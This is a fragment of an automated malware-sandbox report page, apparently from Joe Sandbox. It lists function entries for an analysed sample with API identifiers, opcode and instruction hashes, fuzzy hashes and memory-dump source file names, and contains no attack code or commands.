                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                              • String ID:
                              • API String ID: 140117192-0
                              • Opcode ID: 31029eafa361a8816cb3b7c2e50cea46018a43ad4d194b63bd7ab82f81b508e1
                              • Instruction ID: 6c7d99707c27fdafded48004327f6e5df1346f867114d4ee87861b93e7592eb5
                              • Opcode Fuzzy Hash: 31029eafa361a8816cb3b7c2e50cea46018a43ad4d194b63bd7ab82f81b508e1
                              • Instruction Fuzzy Hash: 6B41E9B6A3CB0181EF18AB69FC80366B364FB84744F910936D98D42768DFBCD545CB20
                              Function 00007FF776D1874B Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                              • String ID:
                              • API String ID: 140117192-0
                              • Opcode ID: 4090816444ccd06f36d04890147d9874dc88da504e5caf5353b8954b97740e78
                              • Instruction ID: 2b3ea6c0290b975a6fc675b5c3c67a7730500f5d06c14f6d74e04f17610f8db3
                              • Opcode Fuzzy Hash: 4090816444ccd06f36d04890147d9874dc88da504e5caf5353b8954b97740e78
                              • Instruction Fuzzy Hash: D031F9BA63CB4182EF189B69F880366F364F788744F915536D98D42768DFBCD505CB20
                              Function 00007FF776D17D28 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Resource$DialogFindFreeIndirectLoadParam
                              • String ID:
                              • API String ID: 1214682469-0
                              • Opcode ID: 59effaab94a793ca2fbdf558991555ed1e090edb450195feb7077b6de0fa885d
                              • Instruction ID: 97da7f39ff8a1e930509c60fe3dc295f0530a69abd250632118c1eae45c33f26
                              • Opcode Fuzzy Hash: 59effaab94a793ca2fbdf558991555ed1e090edb450195feb7077b6de0fa885d
                              • Instruction Fuzzy Hash: D8114272A3CB45C2EE145B21F80427AFA61FB89BE1F894A34DE5D07798DF7CD5408A10
                              Function 00007FF776D188C8 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                              • String ID:
                              • API String ID: 140117192-0
                              • Opcode ID: 2ccba7e9cb8161b6830b4bdced448ba4434f463bc3dcbbf20418d4b2244445be
                              • Instruction ID: e82991e29b79a78c86dd80c31bc53d819ec37b6fd290a1cafcddcc073dead51a
                              • Opcode Fuzzy Hash: 2ccba7e9cb8161b6830b4bdced448ba4434f463bc3dcbbf20418d4b2244445be
                              • Instruction Fuzzy Hash: F421B5B6A3CB4582EF18AB64EC80366B365FB84744F910936DA8D43768DFBCD445CB21
                              Function 00007FF776D13C80 Relevance: 6.0, APIs: 4, Instructions: 43windowCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Message$Peek$DispatchMultipleObjectsWait
                              • String ID:
                              • API String ID: 2776232527-0
                              • Opcode ID: 0e89c7557f5549cdd1f7fcb2b8838b8889091e68e9dc0b1ab03ce0efe7400e88
                              • Instruction ID: 36c7b1be869df6708f6af59cdd9b04b9961b8e2fa97a709705bb2d4cd0f86f4d
                              • Opcode Fuzzy Hash: 0e89c7557f5549cdd1f7fcb2b8838b8889091e68e9dc0b1ab03ce0efe7400e88
                              • Instruction Fuzzy Hash: 1911467363C65287FF645B30E844A77EAA2FB99705F829534D64A42988DFBCD448CB10